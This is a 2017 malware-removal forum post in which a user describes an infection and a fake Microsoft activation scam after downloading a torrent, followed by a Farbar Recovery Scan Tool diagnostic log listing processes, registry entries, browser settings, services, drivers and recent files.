Infected with Trojan.SathurBot and Trojan.Fileless.MTGen


#1 captivekangaroo

Posted 09 March 2017 - 09:46 PM

Yesterday I made the mistake of downloading a movie torrent from a site I never heard of but figured since it was in the top 5 of a Google search, I assumed it was a healthy download. When I tried to play the movie torrent, it would not open and after several moments a window appeared informing me that the torrent was incomplete or corrupt. When going back to search again, the Chrome browser started acting strange and I had immediate advertising video pop-ups appear. Fearing a malware infection I ran a Malwarebytes scan. (I did this scan and one more scan today BEFORE coming to this forum for help so if need be I can post the two Malwarebytes scan results also.) After the Malwarebytes scan yesterday, it asked me to restart computer to finish the cleaning process. But when it restarted, a gray warning box came on the screen and informed me that my Windows activation key had been compromised or corrupted and to please call the 888 number on the screen which was a Microsoft number, or so they said. (Riiiiiggght). It kinda looked legitimate except for the terrible grammar and misspelled words. Not to mention wanting me to "re-enter my Microsoft user i.d. and password." (Riiiight) So I ran another Malwarebytes scan and it came up with the infections again. I knew by this time I was outta my league and Shazaam! Here I am. Here is the requested FRST.txt file:

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 08-03-2017

Ran by User (administrator) on CINDI-HP (09-03-2017 13:07:28)
Running from C:\Users\User\Downloads
Loaded Profiles: User &  (Available Profiles: User)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Plays.tv, LLC) C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.3.1.1\WsAppService.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
() C:\Windows\SQ931STI.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
() C:\ProgramData\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
() C:\Program Files\devnullnull2017\SWU\swu.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
() C:\ProgramData\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\SnippingTool.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [Corel Update Helper] => c:\Program Files\Corel\Corel PaintShop Pro X7 (64-bit)\pua.exe [2004312 2015-05-19] (Corel Corporation)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-22] (Microsoft Corporation)
HKLM\...\Run: [SQ931STI] => C:\WINDOWS\SQ931STI.EXE [151552 2007-01-24] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-12-06] (Apple Inc.)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2776528 2016-12-14] (Malwarebytes)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [PlaysTV] => C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe [71440 2016-09-08] (Plays.tv, LLC)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe [58640 2016-08-23] (Raptr, Inc)
HKLM-x32\...\Run: [kbdsprt] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
HKLM\...\Policies\Explorer\Run: [localSPM] => C:\WINDOWS\runkey.exe [424592 2016-08-05] ()
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [26424960 2016-06-28] (Skype Technologies S.A.)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [BingSvc] => C:\Users\User\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2016-11-17] (Apple Inc.)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9105112 2016-11-15] (Piriform Ltd)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Bubbles.scr [806400 2016-07-16] (Microsoft Corporation)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [26424960 2016-06-28] (Skype Technologies S.A.)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [BingSvc] => C:\Users\User\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2016-11-17] (Apple Inc.)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9105112 2016-11-15] (Piriform Ltd)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Bubbles.scr [806400 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [0TheftProtectionDll] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  -> No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2017-01-19]
ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe (Andy OS, inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\start_swu.lnk [2017-01-29]
ShortcutTarget: start_swu.lnk -> C:\Program Files\devnullnull2017\SWU\start.vbs ()
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2016-12-29]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\User\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\..\Interfaces\{149da2ce-6597-4fb4-ac77-0d6dba63dccb}: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{14f793bc-c866-4117-b385-51a5e00f8f35}: [DhcpNameServer] 209.18.47.61 209.18.47.62
ManualProxies: 
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003 -> DefaultScope {5E483FC9-3768-44D5-94AA-A588126E037D} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003 -> {04CC75DD-B8ED-4295-B77E-12F631AF6B8F} URL = hxxp://www.youtube.com/results?search_query={searchTerms}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003 -> {0CEB57FE-B8A8-44C8-994A-1C14E13C6D18} URL = hxxp://rover.ebay.com/rover/1/711-43047-14818-1/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003 -> {5E483FC9-3768-44D5-94AA-A588126E037D} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004 -> DefaultScope {5E483FC9-3768-44D5-94AA-A588126E037D} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004 -> {04CC75DD-B8ED-4295-B77E-12F631AF6B8F} URL = hxxp://www.youtube.com/results?search_query={searchTerms}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004 -> {0CEB57FE-B8A8-44C8-994A-1C14E13C6D18} URL = hxxp://rover.ebay.com/rover/1/711-43047-14818-1/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004 -> {5E483FC9-3768-44D5-94AA-A588126E037D} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-01-29] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-01-29] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-01-21] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-01-21] (Oracle Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-01-29] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-01-29] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-01-29] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-01-29] (Microsoft Corporation)
 
FireFox:
========
FF DefaultProfile: m59rkng9.default
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default [2017-03-09]
FF Homepage: Mozilla\Firefox\Profiles\m59rkng9.default -> hxxps://www.google.com
FF NetworkProxy: Mozilla\Firefox\Profiles\m59rkng9.default -> type", 4
FF Extension: (Dark YouTube Theme) - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default\Extensions\jid1-hDf2iQXGiUjzGQ@jetpack.xpi [2016-09-25]
FF Extension: (leethax.net extension) - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default\Extensions\leethax@leethax.net.xpi [2017-03-05]
FF Extension: (Save Search Command) - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default\Extensions\{6523E848-E572-DC38-99AA-65F1138AB5BD} [2017-03-08] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_221.dll [2017-02-14] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_221.dll [2017-02-14] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-01-21] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-01-21] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-01-29] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=en-us
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxp://tv.twcc.com/listings","hxxp://www.palikan.com/?f=7&a=plk_coinisrs_15_44&cd=2XzuyEtN2Y1L1Qzu0Czzzy0C0D0C0F0F0C0DyCtB0C0CtAyEtN0D0Tzu0StCtAzyyDtN1L2XzutAtFtCtBtFyDtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StAyBzz0FyBtDyEtDtGyEtC0CyCtGyEyD0CyDtGtC0FtA0EtGtDtB0CtBtA0F0ByCyDyB0C0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0CtAtAzyyCtD0DzztG0DtCtAtDtGyEyDtBtBtG0AyBzztBtG0Ezz0D0F0EtB0ByDzztD0ByB2QtN0A0LzutB&cr=1549778723&ir=&uref=chmm","hxxp://search.conduit.com/?ctid=CT3321972&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=4&UP=SP831C4BFD-A01C-4C62-BAB0-4D12B1D8DA90&SSPV="
CHR DefaultSearchKeyword: Default -> https://www.google.com/_
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Default [2017-03-09]
CHR Extension: (Google Drive) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-26]
CHR Extension: (Free Proxy to Unblock any sites 
 Touch VPN) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2017-03-08]
CHR Extension: (Block Sender) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bklnjbfcmglhiaoppcckdodanccbelcg [2017-01-31]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-26]
CHR Extension: (Google Cast) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2016-11-23]
CHR Extension: (Facebook) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\boeajhmfdjldchidhphikilcgdacljfm [2016-05-26]
CHR Extension: (Google Search) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-26]
CHR Extension: (Pandora) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl [2016-05-26]
CHR Extension: (Google Docs Offline) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-20]
CHR Extension: (Crackle) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibfamoapbmmmlknoopmmfofgladlinic [2016-05-26]
CHR Extension: (Grammarly for Chrome) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2017-03-03]
CHR Extension: (Google Maps) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2016-05-26]
CHR Extension: (Facebook Email Signature - By WiseStamp) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\mddbjkchhjpknjmkmkifidnpdnecmbjn [2016-05-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-08]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-26]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-03]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Guest Profile [2017-03-09]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\System Profile [2017-03-09]
CHR HKU\S-1-5-21-149886074-3337202059-3120734808-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2015-08-21] (Advanced Micro Devices, Inc.) [File not signed]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
S3 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\56.0.2924.51\remoting_host.exe [72024 2017-01-03] (Google Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3704520 2017-02-18] (Microsoft Corporation)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4317648 2016-12-14] (Malwarebytes)
R2 PlaysService; C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe [32528 2016-09-08] (Plays.tv, LLC)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-06-24] (Realtek Semiconductor)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.3.1.1\WsAppService.exe [437392 2016-10-10] (Wondershare)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AODDriver4.3; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R2 APXACC; C:\WINDOWS\system32\DRIVERS\appexDrv.sys [229056 2015-04-03] (AppEx Networks Corporation)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 ghsdiagMDM; C:\WINDOWS\system32\DRIVERS\ghsdiagMDM.sys [122496 2011-11-28] (HS Incorporated)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [250816 2017-03-08] (Malwarebytes)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
S3 netr28ux; C:\WINDOWS\System32\drivers\netr28ux.sys [2224128 2016-07-16] (MediaTek Inc.)
R3 netr28x; C:\WINDOWS\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc.)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2016-07-16] (Realtek                                            )
S3 SQ931; C:\WINDOWS\System32\Drivers\Capt931a.sys [593984 2007-06-05] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
U5 usbfilter; C:\Windows\System32\Drivers\usbfilter.sys [47232 2011-08-03] (Advanced Micro Devices)
R1 vmkbd3; C:\WINDOWS\system32\DRIVERS\vmkbd.sys [52288 2016-11-11] (VMware, Inc.)
R0 vsock; C:\WINDOWS\system32\DRIVERS\vsock.sys [91712 2016-09-30] (VMware, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S0 is3srv; SySWOW64\drivers\is3srv64.sys [X]
S0 szkg5; SySWOW64\drivers\szkg64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-03-09 13:07 - 2017-03-09 13:09 - 00024097 _____ C:\Users\User\Downloads\FRST.txt
2017-03-09 12:52 - 2017-03-09 12:52 - 02423808 _____ (Farbar) C:\Users\User\Downloads\FRST64.exe
2017-03-09 12:41 - 2017-03-09 12:41 - 00000000 _____ C:\Users\User\Desktop\New Bitmap Image.bmp
2017-03-09 05:56 - 2017-03-09 05:56 - 00006000 _____ C:\Users\User\Documents\cc_20170309_055621.reg
2017-03-09 01:16 - 2017-03-09 01:16 - 00000000 ____D C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Kodi
2017-03-09 01:13 - 2017-03-09 01:32 - 00000000 ____D C:\Users\User\AppData\Roaming\Kodi
2017-03-09 01:08 - 2017-03-09 01:16 - 00000000 ____D C:\Program Files (x86)\Kodi
2017-03-08 17:03 - 2017-03-08 17:03 - 00000000 ____D C:\Users\User\AppData\Local\e97791
2017-03-08 15:18 - 2017-03-08 15:18 - 00000000 ____D C:\Users\User\AppData\Local\YclnPack
2017-03-08 15:17 - 2017-03-08 17:04 - 00000000 ____D C:\Users\User\AppData\Local\YgfPack
2017-03-08 15:17 - 2017-03-08 15:21 - 00000000 ___HD C:\Users\User\AppData\Local\SysHashTable
2017-03-08 15:13 - 2017-03-08 15:13 - 00000000 ____D C:\Users\User\Downloads\Why Him 2016
2017-03-08 15:12 - 2017-03-08 15:12 - 00032990 _____ C:\Users\User\Downloads\Why Him 2016.torrent
2017-03-08 09:42 - 2017-03-08 09:42 - 00043034 _____ C:\Users\User\Documents\if-a-man-lays-with-another-man-thou-should-be-high_o_2561505.webp
